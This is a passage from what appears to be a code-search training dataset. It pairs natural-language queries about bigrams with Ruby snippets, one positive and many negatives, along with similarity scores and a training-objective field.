"0.56529105",
"0.56384695",
"0.5635767",
"0.5621293",
"0.560591",
"0.55842483",
"0.5555778",
"0.5555002",
"0.5549917",
"0.5517773",
"0.54879624",
"0.5455607",
"0.538293",
"0.5358634",
"0.5322199",
"0.5318279",
"0.5318279",
"0.53157806",
"0.5307401",
"0.5284725",
"0.5264827",
"0.5212416",
"0.5203092",
"0.51916486",
"0.5190926",
"0.51691586",
"0.5133269",
"0.5128264",
"0.51107335",
"0.509738",
"0.5094853",
"0.50930786",
"0.50349474",
"0.5026363",
"0.5017952",
"0.50140476",
"0.50135195",
"0.5006762",
"0.4985794",
"0.49832347",
"0.49755543",
"0.49627286",
"0.49574012",
"0.49556914",
"0.49515814",
"0.49507564",
"0.4947123",
"0.49459827",
"0.49458402",
"0.49436402",
"0.49429289",
"0.4933273",
"0.4929251",
"0.49221265",
"0.4920323",
"0.4916641",
"0.4913231",
"0.49040157",
"0.4901646",
"0.48988977",
"0.4898279",
"0.4896985",
"0.48949555",
"0.48910946",
"0.48851874",
"0.48826596",
"0.4879796",
"0.48694566",
"0.48662248",
"0.48643574",
"0.48640466",
"0.4858124",
"0.48575848",
"0.48478484",
"0.48435172",
"0.48435172",
"0.48435172",
"0.48435172",
"0.48435172",
"0.48435172",
"0.48435172",
"0.48435172",
"0.48435172",
"0.48435172",
"0.48435172",
"0.4840127",
"0.48390204",
"0.48334554",
"0.483021",
"0.482508",
"0.48182508"
] | 0.49693602 | 50 |
Iterate over each bigram as an instance of Bigram. | def each
@table.each do |pair, bigram|
yield(bigram)
end
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def load_bigrams\n bigrams = []\n\n begin\n sql = \"SELECT bigram_id, word1, word2, count FROM Bigrams;\"\n stm = @db.prepare sql\n rs = stm.execute\n\t\t while (row = rs.next) do\n\t\t id, w1, w2, c = *row\n\t\t bigrams << Bigrams.new(w1, w2, :count=>c, :id=>id)\n\t\t end\n ensure\n stm.close\n end\n\n begin \n sql = \"SELECT file_path, file_count FROM BigramFiles WHERE bigram_id = ?\"\n stm = @db.prepare sql\n\n\t\t bigrams.each do |b|\n\t\t rs = stm.execute(b.id)\n\t\t files = {}\n\t\t while (row = rs.next) do\n\t\t path, count = *row\n\t\t files[path] = count\n\t\t end\n\t\t b.files = files\n\t\t end\n ensure\n stm.close\n end\n\n return bigrams\n end",
"def scan\n $stderr.print \"[bigrams] \"\n\n last = nil\n\n bigram_files.each do |file|\n $stderr.print \".\"\n\n text = File.read(file).gsub(\"\\n\", \" \")\n states = text.split(/[.,:;?!()\"]\\s*/)\n\n states.each do |state|\n state.scan(WORD) do |word|\n word = normalize(word)\n if valid_word?(word)\n\t\t if last && good_bigram?(word)\n add(last, word, file)\n\t\t end\n\t\t last = word\n else\n last = nil\n end\n end\n last = nil\n end\n last = nil\n end\n\n $stderr.puts\n end",
"def n_gramas\n for i in 2...8\n busca_n_gramas(i)\n end\n end",
"def gen_bigrams(a)\n bigrams = a.zip(a[1..-1])\n bigrams.pop # remove last useless one [lastitem, nil]\n return bigrams\nend",
"def construct_bigram(title)\n\t#eliminate stop words before creating bigram counts\n\tpattern = /a\\b|an\\b|and\\b|by\\b|for\\b|from\\b|in\\b|of\\b|on\\b|or\\b|out\\b|the\\b|to\\b|with\\b/ #\\b to match the end of the word so it doesnt grab an when the word is and\n\ttitle.gsub!(pattern,\"\")\n\n\ttitle_array = title.split #split the title by words. (splits by spaces by default)\n\n\tfor i in 0..title_array.length-2\n\t\t$bigrams[title_array[i]]\n\t\tif $bigrams[title_array[i]] == nil #when the key/second hash does not exist, create a new one and initialize to 0 so we can increment\n\t\t\t$bigrams[title_array[i]] = Hash.new(0)\n\t\tend\n\t\t#increment value for the key by one\n\t\t$bigrams[title_array[i]][title_array[i+1]] += 1\n\tend\nend",
"def each\n @gens.each { |g| g.rewind }\n\n loop do\n count = 0\n\n ret = @gens.map { |g|\n if g.end?\n count += 1\n nil\n else\n g.next\n end\n }\n\n if count == @gens.size\n break\n end\n\n yield ret\n end\n\n self\n end",
"def each_gram(&block)\n @frequencies.each_key(&block)\n end",
"def each &block\n enumerator = Enumerator.new do |words|\n words << as_word if terminal?\n children.each { |child| child.each { |word| words << word } }\n end\n\n block.nil? ? enumerator : enumerator.each(&block)\n end",
"def each\n # Include every to be inside enumerable:\n yield \"pizza\"\n yield \"spaghetti\"\n yield \"salad\"\n yield \"water\"\n yield \"bread\"\n end",
"def load_bigrams(filename)\n #puts filename\n CSV.foreach(filename, :headers=>true) do |row|\n bigram = row['bigram']\n bigram.gsub!(' ','_')\n @bigrams << bigram\n end\n end",
"def bigram_count()\n\t@corpus.each { |sentence_arr|\n\t prev_word = \"\"\n\t sentence_arr.each { |word|\n\t\tif(prev_word != \"\")\n\t\t @bifreq[prev_word + \" \" + word] += 1\n\t\telse\n\t\t @bifreq[\"PHI \"+word] += 1\n\t\tend \t \t\n\t\tprev_word = word\n\t }\n\t}\n end",
"def yield_ngrams(str, ngram_size=@ngram_size)\n ngram_list = ngram_list(str, ngram_size)\n ngram_list.each { |ngram| yield ngram }\n end",
"def each\n yield \"pizza\"\n yield \"spagetti\"\n yield \"salad\"\n yield \"bread\"\n yield \"water\"\n end",
"def bigramate(word)\n (0..(word.length - 2)).map { |i| word.slice(i, 2) }\n end",
"def each\n yield \"pizza\"\n yield \"spaghetti\"\n yield \"salad\"\n yield \"bread\"\n yield \"water\"\n end",
"def each\n @length.times {|i|\n yield @gens.collect {|x| x[i]}\n }\n self\n end",
"def next_iteration\n morpheme_hypotheses = hypothesize_morphemes\n return [] if morpheme_hypotheses.empty?\n equivalence_classes = collect_morpheme_hypotheses(morpheme_hypotheses)\n new_morphemes = equivalence_classes.new_morphemes\n insert_morphemes_into_analyses(new_morphemes)\n end",
"def find_bigrams(str, bigrams)\n bigrams.select { |bigram| str.include?(bigram)}\nend",
"def each\n return enum_for :each unless block_given?\n\n yield as_word if terminal?\n\n children_tree.each_value do |child|\n child.each do |word|\n yield word\n end\n end\n\n self\n end",
"def each( )\n\t\t\tsquares = (\"a\"..\"h\").map do |file|\n\t\t\t\t(1..8).map { |rank| \"#{file}#{rank}\" }\n\t\t\tend.flatten.each do |square|\n\t\t\t\tyield [square, @squares[square]]\n\t\t\tend\n\t\tend",
"def all_bams\n bm = Bam.select('id, model, code').where(state: 'catalog').uniq(&:code)\n # Format to show in view\n bam = bm.map { |m| [m.model, m.model] }\n return bam\n end",
"def addtoB(title)\n\t#title = \"let's see what this is doing\"\n\tstops = [\" a \", \" an \", \" and \", \" by \", \" for \", \" from \", \" in \", \" of \", \" on \", \" or \", \" out \", \" the \", \" to \", \" width \"] # list of stop words\n\tfor word in stops do # go through the stop words: if they exist in the sentence, we will...\n\t\t\ttitle = title.gsub(word, \" \") # changes word to NOTHING! Well, a space I guess. but still.\n\t\tend\n\n\ttitle_words = title.split(\" \") # splits title into various words\n\n\twhile (title_words.length > 1)\n\t\tfirst_word = title_words[0] # saves the first word to title bigram\n\t\tnext_wrd = title_words[1] # the next word in the title is the one we want to add\n\t\ttitle_words = title_words[1..-1] # chops off the first word and proceeds through\n\n\t\tif ($bigrams.has_key?(first_word)) # if we already have a key, we don't need a new hash\n\t\t\t# do nothing\n\t\telse\n\t\t\t$bigrams[first_word] = Hash.new # if word hasn't been encountered before, give it a new hash\n\t\tend\n\t\t\t\tif ($bigrams[first_word].has_key?(next_wrd)) # if the next word exists for the current word...\n\t\t\t\t\t$bigrams[first_word][next_wrd] = $bigrams[first_word][next_wrd] + 1 # then all we're doing is incrementing the count for that word by one.\n\t\t\t\telse\n\t\t\t\t$bigrams[first_word].merge!(next_wrd => 1) # otherwise, we will set the count of that word to one.\n\t\t\tend\n\t\tend\n\tend",
"def each\n\t\tyield \"piaza\"\n\t\tyield \"spaghetti\"\n\t\tyield \"salad\"\n\t\tyield \"water\"\n\tend",
"def ngrams(len = 1)\n ngrams = []\n len = size if len > size\n (0..size - len).each do |n|\n ng = self[n...(n + len)]\n ngrams.push(ng)\n yield ng if block_given?\n end\n ngrams\n end",
"def process_file(file_name)\n\tputs \"Processing File.... \"\n\tbegin\n\t\tIO.foreach(file_name, encoding: \"utf-8\") do |line|\t\t\t\t\t\t\t\t\t\t\t\t\t#for each line\n\t\t\ttitle = cleanup_title(line)\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#clean up title\n\t\t\tif title != nil\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#unless the title doesnt exist\n\t\t\t\twords = title.split(/\\s/)\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#split the title into seperate words and remove all the stop words mentioned in the lab\n\t\t\t\twords.delete(\"a\")\n\t\t\t\twords.delete(\"an\")\n\t\t\t\twords.delete(\"and\")\n\t\t\t\twords.delete(\"by\")\n\t\t\t\twords.delete(\"for\")\n\t\t\t\twords.delete(\"from\")\n\t\t\t\twords.delete(\"in\")\n\t\t\t\twords.delete(\"of\")\n\t\t\t\twords.delete(\"on\")\n\t\t\t\twords.delete(\"or\")\n\t\t\t\twords.delete(\"out\")\n\t\t\t\twords.delete(\"the\")\n\t\t\t\twords.delete(\"to\")\n\t\t\t\twords.delete(\"with\")\n\t\t\t\t(0..words.size-2).each do |i|\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# for the size of the words array minus two because we dont want to check bigrams of the last word\n\t\t\t\t\tif $bigrams[\"#{words[i]}\"][\"#{words[i+1]}\"].nil?\t\t\t\t\t\t\t\t\t\t#if the first layer doesnt contain the current word, add it with it's following word with a value of 1\n\t\t\t\t\t\t$bigrams[\"#{words[i]}\"].store(\"#{words[i+1]}\", 1)\n\t\t\t\t\telse\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#otherwise, increment the value of the following key word\n\t\t\t\t\t\t$bigrams[\"#{words[i]}\"][\"#{words[i+1]}\"] += 1\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\t\t#p $bigrams.values.inspect\n\t\tend\n\t\t#puts mcw(\"a\")\n\t\tputs \"Finished. Bigram model built.\\n\"\n\t#rescue\n\t\t#STDERR.puts \"Could not open file\"\n\t\t#exit 4\n\tend\nend",
"def each\n while nextperm\n yield indices.map { |i| alphabet[i] }\n end\n end",
"def each\n to_a.each\n end",
"def each\n to_a.each\n end",
"def each\n to_a.each\n end",
"def bigram_compare(word1_bigrams, word2_bigrams)\n most_bigrams = [word1_bigrams.count, word2_bigrams.count].max\n num_matching(word1_bigrams, word2_bigrams).to_f / most_bigrams\n end",
"def each\n words.each { |word| yield(word) }\n end",
"def each\n words.each { |word| yield( word ) }\n end",
"def matching_bigrams(word1)\n list = @index[word1]\n list.map{ |word2| @table[[word1,word2]] }\n end",
"def get_bigrams(string)\n s = string.downcase\n v = []\n (s.length-1).times{ |i|\n v[i] = s[i...i+2]\n }\n return v\n end",
"def each\r\n # Cache to ensure unprocessed quad's native faces doesn't return twice.\r\n skip = {}\r\n for entity in all\r\n if entity.is_a?( Sketchup::Face )\r\n next if skip[ entity ]\r\n if quad = @faces_to_quads[ entity ]\r\n # Existing Quad\r\n for face in quad.faces\r\n skip[ face ] = face\r\n end\r\n yield( quad )\r\n elsif QuadFace.is?( entity )\r\n # Unprocessed Quad\r\n quad = QuadFace.new( entity )\r\n cache_entity( quad )\r\n for face in quad.faces\r\n skip[ face ] = face\r\n end\r\n yield( quad )\r\n else\r\n # Native Face\r\n cache_entity( entity )\r\n yield( entity )\r\n end\r\n else\r\n # All other entities\r\n cache_entity( entity )\r\n yield( entity )\r\n end\r\n end\r\n end",
"def each\n @table.each do |_, word|\n yield(word)\n end\n end",
"def my_map\n array = []\n self.my_each do |word|\n array << yield(word)\n end\n return array\n end",
"def each\n self.to_a.each do |el|\n yield(el)\n end\n end",
"def each() @symbols.each {|s| yield s if block_given? } end",
"def each_family\n @ks[:family].each do |k,v|\n yield k\n end\n end",
"def process_file(file_name)\r\n\tputs \"Processing File.... \"\r\n\r\n\tbegin\r\n\t\tcounter = Hash.new\r\n\t\tfile = File.open(file_name)\r\n\t\tuntil file.eof?\r\n\t\t\tfile.each_line do |line|\r\n\t\t\t\t# do something for each line\r\n\t\t\t\ttitle = cleanup_title(line)\r\n\t\t\t\tunless(title == \"\")\r\n\t\t\t\t\tbigram = title.split().each_cons(2).to_a\r\n\t\t\t\t\tbigram = bigram.map{ |n| n.join(' ')}\r\n\t\t\t\t\tbigram = bigram.each_with_object(Hash.new(0)){|word, obj| obj[word] += 1}\r\n\t\t\t\t\tif bigram.any?\r\n\t\t\t\t\t\tcounter.merge!(bigram) { |k, old, new| old + new}\r\n\t\t\t\t\tend\r\n\t\t\t\tend\r\n\t\t\tend\r\n\t\tend\r\n\t\tfile.close\r\n\r\n\t\t$bigramsArray = counter.sort_by { |k, v| -v }\r\n\t\tcreate_hash()\r\n\t\t#$bigrams = $bigrams.to_h\r\n\r\n\t\t#$bigramsHash = Hash.new\r\n\t\t#$bigramsHash = $bigrams.to_h\r\n \t#$bigrams.each { |k, v| puts \"#{v} => #{k}\"}\r\n\r\n\r\n\t\tputs \"Finished. Bigram model built.\\n\"\r\n\trescue\r\n\t\tSTDERR.puts \"Could not open file\"\r\n\t\texit 4\r\n\tend\r\n\r\nend",
"def each(&block); end",
"def each(&block); end",
"def each(&block); end",
"def each(&block); end",
"def each(&block); end",
"def each(&block); end",
"def create_ramfs\n super\n end",
"def each(*) end",
"def each\n @type_variants.values.each { |tv| tv.each { |t| yield t } }\n end",
"def each; end",
"def each; end",
"def each; end",
"def each; end",
"def each; end",
"def each; end",
"def each; end",
"def each; end",
"def each; end",
"def each; end",
"def each; end",
"def each\n entry_length = struct_class_length\n (length / entry_length).times do |i|\n yield self[i]\n end\n end",
"def process_file(file_name)\n\tputs \"Processing File.... \"\n\n\tbegin\n\t\tall = Hash.new\n\t\tIO.foreach(file_name) do |line|\n\t\t\t# do something for each line\n\t\t\ttitle = cleanup_title(line)\n\t\t\tunless title.nil?\n\t\t\t\tgram = title.split().each_cons(2).to_a\n\t\t\t\tgram = gram.map{ |n| n.join(' ') }\n \t\t\t\tgram = gram.each_with_object(Hash.new(0)) { |word, obj| obj[word] += 1 }\n \t\t\t\tif gram.any?\n\t \t\t\t\tall.merge!(gram) { |k, old, new| old + new }\n\t \t\t\tend\n\t\t\tend\n\t\tend\n\t\t$bigramsArray = all.sort_by { |k, v| -v }\n\t\tcreate_hash()\n\t\tputs \"Finished. Bigram model built.\\n\"\n\trescue\n\t\tSTDERR.puts \"Could not open file\"\n\t\texit 4\n\tend\nend",
"def draw_bombs bombs\r\n bombs.each do |bomb|\r\n draw_bomb(bomb)\r\n end\r\nend",
"def each_term\n\t\t\tself.to_terms.each do |term|\n\t\t\t\tyield term.stem\n\t\t\tend\n\t\tend",
"def iterate\n raise \"You should implement this\"\n end",
"def each\n @children.each {|child| yield child}\n end",
"def each_v1\n words.each { |word| yield(word) }\n end",
"def each\n @children.each { |child| yield child }\n end",
"def each()\n self.to_a.each { |elt| yield elt }\n end",
"def each\n yield self\n end",
"def index\n\t\t@antibiograms = Antibiogram.all\n\tend",
"def each\r\n @many = true\r\n yield(self)\r\n end",
"def each # And define each on top of next\n loop {yield self.next }\n end",
"def each()\n hijos.each() do |v|\n yield v\n end\n end",
"def each\n yield self[0]\n yield self[1]\n end",
"def process_file(file_name)\n\tputs \"Processing File.... \"\n\n\tbegin\n\t\tIO.foreach(file_name, encoding: \"utf-8\") do |line|\n\t\t\ttitle = cleanup_title(line)\n\t\t\t# If the title is valid continue\n\t\t\tif title != nil\n\t\t\t\t# Split the title into words\n\t\t\t\twords = title.split(\" \")\n\t\t\t\tw_index = 0\n\t\t\t\t# Remove the stop words\n\t\t\t\twords = words - %w{a an and by for from in of on or out the to with}\n\t\t\t\t# If there is more than one word in a title add to biagram\n\t\t\t\tif words.length > 1\n\t\t\t\t\twords.each do |w|\n\t\t\t\t\t\t# If there is no base word add it\n\t\t\t\t\t\tif $bigrams[w] == nil\n\t\t\t\t\t\t\t$bigrams[w] = Hash.new\n\t\t\t\t\t\t\t$bigrams[w][words[w_index + 1]] = 1\n\t\t\t\t\t\t# Else if there is no word following the word add it\n\t\t\t\t\t\telsif $bigrams[w][words[w_index + 1]] == nil\n\t\t\t\t\t\t\t$bigrams[w][words[w_index + 1]] = 1\n\t\t\t\t\t\t# Else increment the count of the word following\n\t\t\t\t\t\telse\n\t\t\t\t\t\t\t$bigrams[w][words[w_index + 1]] += 1\n\t\t\t\t\t\tend\n\t\t\t\t\t\tw_index += 1\n\t\t\t\t\t\t# Don't include the last word in the title\n\t\t\t\t\t\tif w_index > words.length - 2\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\tend\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\t\tputs \"Finished. Bigram model built.\\n\"\n\trescue\n\t\traise\n\t\tSTDERR.puts \"Could not open file\"\n\t\texit 4\n\tend\nend",
"def update_bigram_counts(words)\n\t(0..(words.length - 2)).each do |i|\n\t\tkey = words[i]\n\t\tif $bigrams.has_key? key\n\t\t\tcounts = $bigrams[key]\n\t\t\tif counts.has_key? words[i + 1]\n\t\t\t\tcounts[words[i + 1]] += 1\n\t\t\telse\n\t\t\t\tcounts[words[i + 1]] = 1\n\t\t\tend\n\t\telse\n\t\t\tcounts = {words[i + 1] => 1}\n\t\t\t$bigrams[key] = counts\n\t\tend\n\tend\nend",
"def process_file(file_name)\n\tputs \"Processing File.... \"\n\n\tbegin\n\t\tIO.foreach(file_name) do |line|\n\t\t\t# call cleanup_title method to extract song titles\n\t\t\ttitle = cleanup_title(line)\n\n\t\t\t#ignore titles with non-english characters\n\t\t\tif title[/(\\w|\\s|\\')*/] == title\n\t\t\t\ttitle = title.split\n\t\t\t\ti = 0;\n\n\t\t\t\twhile i <= title.size-1 #loop through array of words\n\t\t\t\t\thasKey = $bigrams[title[i]] #first word\n\t\t\t\t\thasChild = $bigrams[title[i]] && $bigrams[title[i]][title[i+1]] #second word that follows first\n\t\t\t\t\tbreak if title[i+1].nil? #break if this is the last word in the array\n\n\t\t\t\t\tif hasChild #if child of primary key exists, add one to the count\n\t\t\t\t\t\t$bigrams[title[i]][title[i+1]] += 1;\n\t\t\t\t\telsif hasKey #if primary key exists, add new child with initial count = 1\n\t\t\t\t\t\t$bigrams[title[i]][title[i+1]] = 1;\n\t\t\t\t\telse #if primary key does not exist, add it and child key\n\t\t\t\t\t\t$bigrams[title[i]] = {title[i+1] => 1};\n\t\t\t\t\tend\n\t\t\t\t\ti += 1;\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\t\tputs \"Finished. Bigram model built.\\n\"\n\trescue\n\t\tSTDERR.puts \"Could not open file\"\n\t\texit 4\n\t end\nend",
"def each\n end",
"def each\n nodo1 = @lista_alimentos.head\n nodo2 = @gramos.head\n while (nodo1 != nil && nodo2 != nil)\n yield nodo1.value\n nodo1 = nodo1.next\n nodo2 = nodo2.next\n end\n end",
"def each\n all.each do |el|\n yield el\n end\n end",
"def each\n yield self\n children.each {|c| c.each {|n| yield n}}\n end",
"def each &block\n #els = elements.map{|e| Builder.new(singular_r_name, e).build}\n return elements.to_enum if !block_given?\n for element in elements\n block.call(element)\n end\n end",
"def each_mRNA\n parse if !@mrnalist\n each_item(@mrnalist) { |id, recs, component | yield id, recs, component }\n end",
"def each\n all.each do |el|\n yield el\n end\n end",
"def each_queue\n @cache.each do |queue|\n yield queue\n end\n end",
"def each\n items.each { |itm| yield itm }\n end",
"def each # And define each on top of next\n loop { yield self.next }\n end",
"def anagrams_for(word, array)\n array.find_all {|element| are_anagrams?(word, element)}\nend",
"def each\n self.to_hash.each\n end",
"def each &block\n db.iterinit\n loop do\n key = db.iternext or break\n val = db[key]\n yield key, val\n end\n end",
"def pangram_search(words, &block)\n # Bust out if we've found enough pangrams\n raise AllDone.new if @max_count != 0 && @count > @max_count\n \n h = LetterHistogram.new words\n\n # If we already have more words or more repeats, then no need to look any\n # further, we should backtrack and try something else.\n return if words.size >= @min_size && h.repeats >= @min_repeats\n\n # This pangram is somehow minimal, so pass to the block\n if h.pangram?\n @min_size = words.size if words.size < @min_size\n @min_repeats = h.repeats if h.repeats < @min_repeats\n @count += 1\n yield words,h\n return\n end\n\n # No pangram yet, find children and descend\n new_words = @word_letters.least_common words,h\n new_words.each {|w| pangram_search words + [w], &block}\n end",
"def each(&block)\n @all.each_batch { |batch| batch.each { |s| yield s } }\n end",
"def each\n songs.each do |song|\n yield song\n end\n end",
"def all_matches\n b = GenerateBets.new(1, 1, 40)\n # ap b.generate_sameple\n return b.generate_sameple\n # return b.example_feed\n end",
"def each()\n i = 0\n while i < @total\n yield at(i)\n i += 1\n end\n self\n end",
"def use_bigram(str,i)\n\t\tmax=@han[str[i]][0]\n\t\tif i==0\n\t\t\t@han[str[i]].each{|h|\n\t\t\t\tif ref(\"$\"+h)>ref(\"$\"+max)\n\t\t\t\t\tmax=h\n\t\t\t\tend\n\n\t\t\t}\n\t\telse\n\t\t\t\t@han[str[i]].each{|h|\n\t\t\t\tif ref(str[i-1]+h)>ref(str[i-1]+max)\n\t\t\t\t\tmax=h\n\t\t\t\tend\n\n\t\t\t}\n\t\tend\n\t\treturn max\n\n\tend",
"def each\n (bytesize * 8).times do |pos|\n yield self[pos]\n end\n end",
"def each\n [@lval,@rval,@operator].each { |child| yield child }\n end"
] | [
"0.6529484",
"0.6284862",
"0.58925784",
"0.55048925",
"0.55033886",
"0.5483166",
"0.547559",
"0.54718196",
"0.53993124",
"0.53735304",
"0.53317696",
"0.5310152",
"0.5298479",
"0.52913725",
"0.5232824",
"0.52292114",
"0.522671",
"0.5221761",
"0.5211718",
"0.52070147",
"0.51845556",
"0.5179349",
"0.5127128",
"0.51222265",
"0.50948095",
"0.50915277",
"0.50751865",
"0.50751865",
"0.50751865",
"0.50332475",
"0.503241",
"0.50067306",
"0.5002444",
"0.49993286",
"0.49829108",
"0.4976749",
"0.49679387",
"0.49608693",
"0.49605483",
"0.49588877",
"0.49563065",
"0.49500075",
"0.49500075",
"0.49500075",
"0.49500075",
"0.49500075",
"0.49500075",
"0.49493787",
"0.49259007",
"0.49088064",
"0.49082088",
"0.49082088",
"0.49082088",
"0.49082088",
"0.49082088",
"0.49082088",
"0.49082088",
"0.49082088",
"0.49082088",
"0.49082088",
"0.49082088",
"0.49064243",
"0.49029568",
"0.48929235",
"0.4889658",
"0.48741567",
"0.4871623",
"0.48605525",
"0.485688",
"0.48567164",
"0.4854834",
"0.4849848",
"0.48462775",
"0.4843884",
"0.48434535",
"0.48411348",
"0.48389992",
"0.48382616",
"0.48358202",
"0.48291433",
"0.48233217",
"0.48197612",
"0.48180306",
"0.48160335",
"0.48145413",
"0.48109147",
"0.48005044",
"0.4796155",
"0.47922522",
"0.47894582",
"0.47867823",
"0.4784441",
"0.47742182",
"0.47639182",
"0.47549838",
"0.475484",
"0.47407192",
"0.47367135",
"0.4736221",
"0.47349092"
] | 0.7697235 | 0 |
Total number of bigrams. | def total
@total ||= (
tally = 0
each do |b|
tally += b.count
end
tally
)
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def bigram_count()\n\t@corpus.each { |sentence_arr|\n\t prev_word = \"\"\n\t sentence_arr.each { |word|\n\t\tif(prev_word != \"\")\n\t\t @bifreq[prev_word + \" \" + word] += 1\n\t\telse\n\t\t @bifreq[\"PHI \"+word] += 1\n\t\tend \t \t\n\t\tprev_word = word\n\t }\n\t}\n end",
"def total_grams\n data[:total_grams]\n end",
"def lexigram_counter(sequencetext)\n @sequencetext = sequencetext\n\t@lexigrams = lexigram_searcher(@sequencetext)\n\tif (@lexigrams === [\"no letters remain after processing\"])\n\t @lexigrams_count = 0\n else\n @lexigrams_count = @lexigrams.count.to_s\n end\n end",
"def bigram_compare(word1_bigrams, word2_bigrams)\n most_bigrams = [word1_bigrams.count, word2_bigrams.count].max\n num_matching(word1_bigrams, word2_bigrams).to_f / most_bigrams\n end",
"def gramos\r\n grams = 0\r\n @lista_alimentos.each do |i|\r\n grams += 100\r\n end\r\n return grams\r\n end",
"def total_words\n words.size\n end",
"def trigram_count()\n\t@corpus.each { |sentence_arr|\n\t prev_word_1 = \"\"\n\t prev_word_2 = \"\"\n\t sentence_arr.each { |word|\n\t\tif(prev_word_1 != \"\" && prev_word_2 != \"\")\n\t\t @trifreq[prev_word_1 + \" \" + prev_word_2 + \" \" + word] += 1\n\t\telsif(prev_word_1 == \"\" && prev_word_2 != \"\")\n\t\t @trifreq[\"PHI \"+prev_word_2+\" \"+word] += 1\n\t\telsif(prev_word_1 == \"\" && prev_word_2 == \"\")\n\t\t @trifreq[\"PHI PHI \"+word] += 1\t\n\t\tend \t \t\n\t\tprev_word_1 = prev_word_2 \n\t\tprev_word_2 = word\n\t }\n\t}\n end",
"def count\n self.wordcounts.map(&:count).inject(0, :+)\n end",
"def grams\n gram_equivalent / amount\n end",
"def update_bigram_counts(words)\n\t(0..(words.length - 2)).each do |i|\n\t\tkey = words[i]\n\t\tif $bigrams.has_key? key\n\t\t\tcounts = $bigrams[key]\n\t\t\tif counts.has_key? words[i + 1]\n\t\t\t\tcounts[words[i + 1]] += 1\n\t\t\telse\n\t\t\t\tcounts[words[i + 1]] = 1\n\t\t\tend\n\t\telse\n\t\t\tcounts = {words[i + 1] => 1}\n\t\t\t$bigrams[key] = counts\n\t\tend\n\tend\nend",
"def gramos_total\n\t\tsuma = 0\n\t\t\n\t\t@gramos.each do |i|\n\t\t\tsuma += i\n\t\tend\n\n\t\treturn suma.round(2)\n\tend",
"def word_count\n @tried_solutions.length\n end",
"def size\n @gens.size\n end",
"def size\n @gens.size\n end",
"def totalGramos\n\t\tgramos = 0\n\t\ttotal = 0\n\t\t@platos.each do |alimento|\n\t\t\tgramos += alimento.gramos\n\t\tend\n\t\treturn gramos.round(2)\n\tend",
"def sentence_count\n weighted(:count, :sentence).to_i\n end",
"def length()\n return @letter_bag.length\n end",
"def num_matching(one_bigrams, two_bigrams, acc = 0)\n return acc if one_bigrams.empty? || two_bigrams.empty?\n\n one_two = one_bigrams.index(two_bigrams[0])\n two_one = two_bigrams.index(one_bigrams[0])\n\n if one_two.nil? && two_one.nil?\n num_matching(one_bigrams.drop(1), two_bigrams.drop(1), acc)\n else\n # If one is nil, it is set to the other\n two_one ||= one_two\n one_two ||= two_one\n\n if one_two < two_one\n num_matching(one_bigrams.drop(one_two + 1),\n two_bigrams.drop(1), acc + 1)\n else\n num_matching(one_bigrams.drop(1),\n two_bigrams.drop(two_one + 1), acc + 1)\n end\n end\n end",
"def word_count\n weighted(:count, :word).to_i\n end",
"def num_bases\n self.map { |chr,n| n }.sum\n end",
"def word_count\n @@word_count\n end",
"def grams_per_skein\n data[:grams_per_skein]\n end",
"def word_count\n return words.size\n end",
"def mb_count()\n each_char.map{|c| c.bytesize == 1 ? 1 : 2}.reduce(0, &:+)\n end",
"def calculate_word_count\n 0x0A\n end",
"def total_word_count\n @_total_word_count ||= words.values.reduce(:+)\n end",
"def word_count\n words.size\n end",
"def word_count\n words.size\n end",
"def word_number\n text.split.size\n end",
"def count\n @letters.length\n end",
"def total_sentences\n @string.split(/\\.+/).size\n end",
"def word_sizes(text)\n word_size = Hash.new(0)\n words = text.split\n words.each { |word| word_size[word.size] += 1 }\n word_size\nend",
"def length\n @gens.length\n end",
"def length\n @gens.length\n end",
"def num_sentences\n @sentences.length\n end",
"def adword_count_total(page)\n\t\tadword_count_top(page) + adword_count_right(page)\n\tend",
"def num_words\n @words.length\n end",
"def number_word_char_count\n (1..1000).map(&:english_word).join.count_chars\nend",
"def calculate_word_count\n 0x0C\n end",
"def count\n @words.length\n end",
"def wordCount\n count = 0\n\n if (@word.to_s != '')\n count += 1\n end\n\n if @children.size\n @children.each do |key, val|\n count += val.wordCount\n end\n end\n\n count\n end",
"def ngrams_sum(ngrams)\n ngrams.map { |i| freq[i] }.inject(&:+) || 0\n end",
"def test_size\n @results.map {|node_name, classes|\n classes.size\n }.reduce(:+) || 0\n end",
"def size\n @words.size\n end",
"def num_words(size)\n total = 0\n @word_list.each{ |word| total += 1 if word.size == size }\n total\n end",
"def count_tokens()\n @counts = Hash.new(0)\n @tokens.each do |token|\n @counts[token] += 1\n end\n @counts\n end",
"def total_review_word_count\n review_word_counts.inject(:+)\n end",
"def count(gram)\n @dirty = true\n\n unless @frequencies.has_key?(gram)\n @frequencies[gram] = 0\n end\n\n return @frequencies[gram] += 1\n end",
"def number_of_unique_words\n @frequencies.keys.length\n end",
"def generate_counts(data)\n counts = {}\n data.each do |line|\n unigram = nil\n bigram = nil\n trigram = nil\n\n # prepend buffering ghost values so we can represent trigrams of the first word\n tokens = line.split(' ')\n\n # take a sliding window of the entire line, generating grams as we go\n (1..(tokens.size-1)).to_a.each do |i|\n unigram = tokens[i..i]\n bigram = tokens[i-1..i]\n trigram = tokens[i-2..i]\n\n counts.store(unigram, counts.fetch(unigram, 0) + 1)\n counts.store(bigram, counts.fetch(bigram, 0) + 1)\n counts.store(trigram, counts.fetch(trigram, 0) + 1)\n end\n end\n counts\nend",
"def phraseLength\n\t\treturn @dictionaries.length\n\tend",
"def n_gramas\n for i in 2...8\n busca_n_gramas(i)\n end\n end",
"def total_num_assignment_teams\n assignment_team_counts.inject(:+)\n end",
"def num_rounds\n (Math.log(teams.size) / Math.log(2)).to_i\n end",
